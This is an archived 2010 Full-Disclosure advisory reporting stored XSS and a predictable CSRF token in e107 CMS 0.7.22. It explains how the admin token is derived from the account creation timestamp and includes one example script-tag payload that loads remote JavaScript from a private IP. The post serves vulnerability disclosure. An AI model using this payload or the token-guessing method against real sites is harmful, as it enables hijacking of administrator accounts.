| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 22 Aug 2010 16:29:41 -0400 From: Justin Klein Keane <justin@...irish.net> To: full-disclosure@...ts.grok.org.uk Subject: e107 CMS Multiple Vulnerabilities -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Vulnerability Report Details of this report may also be found at http://www.madirish.net/?article=471 Description of Vulnerability: - ----------------------------- e107 (http://e107.org) is a PHP/MySQL based content management system. e107 allows anonymous users to submit news items for display on the front page. These items enter a queue for review by admins and are subsequently approved or rejected. e107 suffers from cross site scripting (XSS) vulnerabilities because it fails to properly sanitize user supplied input when rendering submitted news item titles for administrative review. Malicious users can submit news at the default submitnews.php URL. e107 sanitizes single quotes to prevent against SQL injection but does not alter double quotes or HTML tags. An attacker could embed a piece of JavaScript, such as '<script type="text/javascript" src="http://172.16.46.129/xsrf.js"/>' before or after their title and this script would execute silently when an administrator viewed the approval queue at e107_admin/newspost.php?sn. e107 suffers from a cross site request forgery (XSRF) vulnerability because it fails to use a difficult to discover random token in the user add form located at e107_admin/users.php?create. The token is carried in a hidden form field 'ac' and is derived from the MD5 hash of the administrative user accounts create date. When the administrative account is created the unix timestamp is stored in the MySQL database in the e107_user.user_pwchange column. Because logged in users can view the 'Joined' state of the admin user at /user.php?id.1 it is easy to derive the unix timestamp for the creation date of the account. Systems affected: - ----------------- e107 0.7.22 was tested and shown to be vulnerable Impact - ------ Unauthenticated users can exploit these vulnerabilities to attack other users, potentially compromising the e107 service or host. Vendor Response: - ---------------- Upgrade to the latest version of e107 in order to mitigate these vulnerabilities. - -- Justin Klein Keane http://www.MadIrish.net -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/ iPwEAQECAAYFAkxxiLUACgkQkSlsbLsN1gDlkAb9HoifQyrWmq6AvC/HygIRuZ22 Zf4RGGxG1fiNGef3n7rVdMIGYSzKxpQh4s+Ro3SqJkuwf9dtdPOVRZ50vF95qzUI 2Wk1h6Y3PwFSXLZRM/sclA2i31xe+Sum0Q1QTI1zzOwxia0FQ54b5bNLb4eT44mP FDVcYqde1zPpKWXQgloJySi+Z2HgxGafUdJYwS4ih/pmGaqi1dFyo5ljBqgLbepY KGjovP+fY9naN+b8HklhqT4nHdkte/73rb7SFOQHSkmfxe6E+Rp251fBROlp9xLz RvPfsl18Nva6GFoz/Iw= =mPwD -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists